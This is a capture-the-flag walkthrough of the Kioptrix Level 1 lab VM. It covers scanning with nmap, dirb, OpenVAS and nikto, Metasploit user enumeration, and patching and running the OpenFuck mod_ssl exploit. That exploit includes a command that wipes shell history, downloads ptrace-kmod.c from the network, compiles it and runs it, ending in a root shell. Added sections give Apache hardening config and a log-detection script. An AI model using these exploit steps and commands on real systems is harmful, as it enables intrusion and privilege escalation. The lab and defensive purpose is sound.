Kioptrix 1

3 March 2018

Source - Vulnhub Kioptrix Level 1-1

Setting up the challenge

Download VMware Workstation and the vulnerable VM, then start it.

Scanning with nmap

Finding the vulnerable machine

nmap 10.0.1.0/24

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-17 20:02 CET
Nmap scan report for 10.0.1.104
Host is up (0.0018s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
443/tcp   open  https
32768/tcp open  filenet-tms
MAC Address: 00:0C:29:BE:28:85 (VMware)

The address is 10.0.1.104.

In-depth scan

nmap -A 10.0.1.104


Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-17 15:15 CET
Nmap scan report for 10.0.1.104
Host is up (0.00047s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: HMYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-02-16T22:42:12+00:00; -15h34m01s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:BE:28:85 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: -15h34m01s, deviation: 0s, median: -15h34m01s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 10.0.1.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 266.87 seconds

Scan summary

Characteristic     Value
Operating System   Running: Linux 2.4.X
Kernel (OS CPE)    cpe:/o:linux:linux_kernel:2.4
OS details         Linux 2.4.9 - 2.4.18 (likely embedded)
Samba              139/tcp open netbios-ssn Samba smbd (workgroup: HMYGROUP)
SSH                OpenSSH 2.9p2 (protocol 1.99)
Apache             Apache/1.3.20 (Unix)

Scanning with dirb

dirb finds hidden pages by requesting every entry of a wordlist of common paths and reporting which ones the server answers.

dirb http://10.0.1.104/ /usr/share/wordlists/dirb/common.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Feb 17 21:49:39 2018
URL_BASE: http://10.0.1.104/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.0.1.104/ ----
+ http://10.0.1.104/~operator (CODE:403|SIZE:273)
+ http://10.0.1.104/~root (CODE:403|SIZE:269)
+ http://10.0.1.104/cgi-bin/ (CODE:403|SIZE:272)
+ http://10.0.1.104/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://10.0.1.104/manual/
==> DIRECTORY: http://10.0.1.104/mrtg/
==> DIRECTORY: http://10.0.1.104/usage/

---- Entering directory: http://10.0.1.104/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.0.1.104/mrtg/ ----
+ http://10.0.1.104/mrtg/index.html (CODE:200|SIZE:17318)

---- Entering directory: http://10.0.1.104/usage/ ----
+ http://10.0.1.104/usage/index.html (CODE:200|SIZE:3704)

-----------------
END_TIME: Sat Feb 17 21:50:04 2018
DOWNLOADED: 13836 - FOUND: 6

Found:

Type       Address                        Response code  Response size
File       http://10.0.1.104/~operator    403            273
File       http://10.0.1.104/~root        403            269
File       http://10.0.1.104/cgi-bin/     403            272
File       http://10.0.1.104/index.html   200            2890
DIRECTORY  http://10.0.1.104/manual/
DIRECTORY  http://10.0.1.104/mrtg/
DIRECTORY  http://10.0.1.104/usage/

dirb summary

The 403 responses for /~root and /~operator suggest that the users root and operator exist on the system.

Scanning with OpenVAS

Install OpenVAS and use it to scan the address.

Port  Proto  CVSS  Severity  CVEs                                          NVT name
443   tcp    7.5   High      CVE-2001-0835                                 Webalizer Cross Site Scripting Vulnerability
80    tcp    7.5   High      CVE-2001-0835                                 Webalizer Cross Site Scripting Vulnerability
443   tcp    5.8   Medium    CVE-2004-2320, CVE-2003-1567                  http TRACE XSS attack
80    tcp    5.8   Medium    CVE-2004-2320, CVE-2003-1567                  http TRACE XSS attack
443   tcp    5     Medium    NOCVE                                         SSL/TLS: Certificate Expired
443   tcp    5     Medium    CVE-2016-2183, CVE-2016-6329                  SSL/TLS: Report Vulnerable Cipher Suites for HTTPS
443   tcp    5     Medium    CVE-2001-1013                                 Apache UserDir Sensitive Information Disclosure
80    tcp    5     Medium    CVE-2001-1013                                 Apache UserDir Sensitive Information Disclosure
443   tcp    5     Medium    NOCVE                                         SSL/TLS: Untrusted Certificate Authorities
443   tcp    4.3   Medium    CVE-2003-1418                                 Apache Web Server ETag Header Information Disclosure Weakness
80    tcp    4.3   Medium    CVE-2003-1418                                 Apache Web Server ETag Header Information Disclosure Weakness
443   tcp    4.3   Medium    CVE-2015-4000                                 SSL/TLS: DHE_EXPORT Man in the Middle Security Bypass Vulnerability (LogJam)
443   tcp    4.3   Medium    CVE-2014-3566                                 SSL/TLS: SSLv3 Protocol CBC Cipher Suites Information Disclosure Vulnerability (POODLE)
443   tcp    4.3   Medium    CVE-2013-2566, CVE-2015-2808, CVE-2015-4000   SSL/TLS: Report Weak Cipher Suites
22    tcp    4.3   Medium    NOCVE                                         SSH Weak Encryption Algorithms Supported
443   tcp    4.3   Medium    CVE-2015-0204                                 SSL/TLS: RSA Temporary Key Handling RSA_EXPORT Downgrade Issue (FREAK)
443   tcp    4.3   Medium    CVE-2016-0800, CVE-2014-3566                  SSL/TLS: Deprecated SSLv2 and SSLv3 Protocol Detection
443   tcp    4.3   Medium    CVE-2012-0053                                 Apache HTTP Server httpOnly Cookie Information Disclosure Vulnerability
80    tcp    4.3   Medium    CVE-2012-0053                                 Apache HTTP Server httpOnly Cookie Information Disclosure Vulnerability
443   tcp    4     Medium    NOCVE                                         SSL/TLS: Diffie-Hellman Key Exchange Insufficient DH Group Strength Vulnerability
-     -      2.6   Low       NOCVE                                         TCP timestamps
22    tcp    2.6   Low       NOCVE                                         SSH Weak MAC Algorithms Supported

Scanning with nikto

Download or update nikto from GitHub.

./nikto.pl -h  10.0.1.104 -Format csv -o ~/Vulnhub/Kioptrix_1/nikto.csv

Port  OSVDB       Method   Path           Description
80    -           -        -              Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
80    OSVDB-0     GET      /              Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 05:12:46 2001
80    OSVDB-0     GET      /              The anti-clickjacking X-Frame-Options header is not present.
80    OSVDB-0     GET      /              The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
80    OSVDB-0     GET      /              The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
80    OSVDB-27487 GET      /              Apache is vulnerable to XSS via the Expect header
80    OSVDB-0     OPTIONS  /              Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
80    OSVDB-877   TRACE    /              HTTP TRACE method is active, suggesting the host is vulnerable to XST
80    OSVDB-0     GET      //etc/hosts    The server install allows reading of any system file by adding an extra '/' to the URL.
80    OSVDB-682   GET      /usage/        Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02.
80    OSVDB-3268  GET      /manual/       Directory indexing found.
80    OSVDB-3092  GET      /manual/       Web server manual found.
80    OSVDB-3268  GET      /icons/        Directory indexing found.
80    OSVDB-3233  GET      /icons/README  Apache default file found.
80    OSVDB-3092  GET      /test.php      This might be interesting...

Additionally, nikto reports the following information:

mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
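As an added example that is not part of the original walkthrough, the httpd.conf fragments below put the settings as found on this box next to the hardened form that addresses the OpenVAS and nikto findings above (UserDir account oracle, TRACE/XST, ETag inode leak, version banner, SSLv2/SSLv3 and weak cipher suites, missing headers, directory indexing). Directive availability by Apache version is noted in the comments, the document root path is an assumption, and the mod_ssl/OpenSSL overflow itself is only fixed by upgrading those packages.

```apacheconf
# Added example, not from the walkthrough: httpd.conf fragments for the
# findings above.  The DocumentRoot path is an assumption.

# ---- As found on the box (weak; mostly the defaults of the time) ----
UserDir public_html          # /~user answers 403 for real accounts, 404 otherwise (CVE-2001-1013)
ServerTokens Full            # Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
ServerSignature On
FileETag INode MTime Size    # default behaviour; ETag leaks the inode (CVE-2003-1418)
SSLProtocol all              # SSLv2 and SSLv3 negotiable (CVE-2016-0800, POODLE)
SSLCipherSuite ALL           # export, RC4, DES and MD5 suites offered (FREAK, LogJam)

# ---- Hardened ----
UserDir disabled             # every /~user gets the same answer: no account oracle
# If per-user pages are really needed, enable them only for listed accounts:
#   UserDir public_html
#   UserDir enabled alice
ServerTokens Prod            # Server: Apache
ServerSignature Off
FileETag None                # FileETag directive exists from Apache 1.3.23 / 2.x
TraceEnable off              # Apache 1.3.34+ / 2.0.55+; stops XST (OSVDB-877)
# Older 1.3.x has no TraceEnable; refuse TRACE with mod_rewrite instead:
RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]
# Headers nikto reported as missing (needs mod_headers)
Header set X-Frame-Options "SAMEORIGIN"
Header set X-Content-Type-Options "nosniff"
<IfModule mod_ssl.c>
    SSLProtocol all -SSLv2 -SSLv3
    SSLCipherSuite HIGH:!aNULL:!MD5:!RC4:!3DES:!EXPORT
    SSLHonorCipherOrder on   # Apache 2.1+
</IfModule>
# /manual/ and /icons/ were listable: turn indexing off (and remove the manual)
<Directory "/var/www/html">
    Options -Indexes
</Directory>
```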

Apache UserDir Sensitive Information Disclosure

OpenVAS lists this vulnerability as CVE-2001-1013.

Apache on Red Hat Linux with the UserDir directive enabled generates different error codes when a username exists but has no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.

We open msfconsole and search for modules matching this CVE:

msfconsole
msf > search CVE-2001-1013

Matching Modules
================

   Name                                        Disclosure Date  Rank    Description
   ----                                        ---------------  ----    -----------
   auxiliary/scanner/http/apache_userdir_enum                   normal  Apache "mod_userdir" User Enumeration

We use the auxiliary module found:

msf > use auxiliary/scanner/http/apache_userdir_enum
msf > show options
msf > set RHOSTS 10.0.1.104
msf > run
[+] http://10.0.1.104/ - Users found: operator, postgres, root
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Conclusion

The system has the users operator, postgres and root.
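As an added detection example (not part of the original walkthrough), the script below runs over constructed Apache access-log lines and flags the two probe patterns seen in this section: a burst of refused /~user requests from one client, reporting the names that were answered 403 (the ones the mod_userdir bug exposes as real accounts), and any TRACE request. The log lines, client addresses and thresholds are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache access-log lines (common log format), not from the box.
SAMPLE_LOG = """\
10.0.1.50 - - [17/Feb/2018:22:00:01 +0100] "GET /index.html HTTP/1.1" 200 2890
10.0.1.50 - - [17/Feb/2018:22:00:02 +0100] "GET /~root HTTP/1.1" 403 269
10.0.1.50 - - [17/Feb/2018:22:00:02 +0100] "GET /~operator HTTP/1.1" 403 273
10.0.1.50 - - [17/Feb/2018:22:00:03 +0100] "GET /~postgres HTTP/1.1" 403 275
10.0.1.50 - - [17/Feb/2018:22:00:03 +0100] "GET /~admin HTTP/1.1" 404 280
10.0.1.51 - - [17/Feb/2018:22:05:10 +0100] "TRACE / HTTP/1.1" 200 118
10.0.1.52 - - [17/Feb/2018:22:07:00 +0100] "GET /~alice/ HTTP/1.1" 200 1020
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
USERDIR_RE = re.compile(r'^/~([A-Za-z0-9._-]+)')

def parse_line(line):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def detect(lines, window=timedelta(seconds=60), threshold=4):
    """Return (ip, kind, detail) alerts.
    userdir_enum: a client had >= threshold distinct refused (403/404) /~user
    probes within `window`; detail lists the names answered 403, which the
    mod_userdir bug marks as existing accounts.  trace_method: any TRACE."""
    probes = defaultdict(list)   # ip -> [(ts, user, status)]
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "TRACE":
            alerts.append((rec["ip"], "trace_method", rec["path"]))
        um = USERDIR_RE.match(rec["path"])
        if um and rec["status"] in (403, 404):
            probes[rec["ip"]].append((rec["ts"], um.group(1), rec["status"]))
    for ip, events in sorted(probes.items()):
        for start, _, _ in events:
            hits = [(u, s) for t, u, s in events if timedelta(0) <= t - start <= window]
            if len({u for u, _ in hits}) >= threshold:
                alerts.append((ip, "userdir_enum", sorted({u for u, s in hits if s == 403})))
                break
    return alerts
```

Running detect(SAMPLE_LOG.splitlines()) yields one trace_method alert for 10.0.1.51 and one userdir_enum alert for 10.0.1.50 naming operator, postgres and root; the successful /~alice/ request is not counted as a probe.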

mod_ssl buffer overflow

Source: Hypn.za.net

One of the popular boot-to-root VMs has an exploit (764.c) which doesn't compile so well in modern Kali, producing the errors:

764d.c:643:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
764d.c:651:2: error: unknown type name ‘RC4_KEY’
764d.c:652:2: error: unknown type name ‘RC4_KEY’
764d.c:844:7: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:845:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
764d.c:882:2: error: unknown type name ‘MD5_CTX’
764d.c:887:23: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:977:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
764d.c:1069:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
764d.c:1106:2: error: unknown type name ‘MD5_CTX’
764d.c:1111:42: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:1127:23: error: ‘RC4_KEY’ undeclared (first use in this function)
764d.c:1127:31: error: expected expression before ‘)’ token
764d.c:1131:32: error: expected expression before ‘)’ token
764d.c:1146:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
764d.c:1158:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
764d.c:1171:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)

Luckily there was a blog post written in 2014 by @paulwebsec explaining how to update the exploit, which fixes some of them but still leaves you with:

764b.c:645:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
764b.c:847:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
764b.c:979:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
764b.c:1071:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
764b.c:1148:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
764b.c:1160:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
764b.c:1173:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)

On Kali (and likely other Debian based distros) you can work around this by simply doing an "apt-get install libssl1.0-dev" to roll back your libssl-dev version, but why don't we get this compiling with the modern lib…

The changes to make (including Paul's) are:

  1. Add this below line 24 (the last #include):
#include <openssl/rc4.h>
#include <openssl/md5.h>

#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16
  2. Replace "COMMAND2" on (now) line 672:
#define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
  3. Add "const" to the beginning of (now) line 970:
const unsigned char *p, *end;
  4. Replace the "if" on (now) line 1078 with:
if (EVP_PKEY_get1_RSA(pkey) == NULL) {
  ...}
  5. Replace the "encrypted_key_length" code on (now) line 1084 with:
encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
  6. Install "libssl-dev" (if not already installed):
apt-get install libssl-dev
  7. Compile!
gcc -o 764 764.c -lcrypto

Exploiting the overflow

We display the usage with ./764:

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./764 target box [port] [-c N]

  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)


  Supported OffSet:
  0x00 - Caldera OpenLinux (apache-1.3.26)
  0x01 - Cobalt Sun 6.0 (apache-1.3.12)
  ...
  0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
  0x0d - Debian GNU Linux (apache_1.3.19-1)
  0x0e - Debian GNU Linux (apache_1.3.22-2)

From the information gathered, we exploit the vulnerability with:

./764 0x6b 10.0.1.104 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304
--22:08:06--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   1.87 MB/s

22:08:07 (1.87 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 8110
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...

From there we now have a remote shell with root access!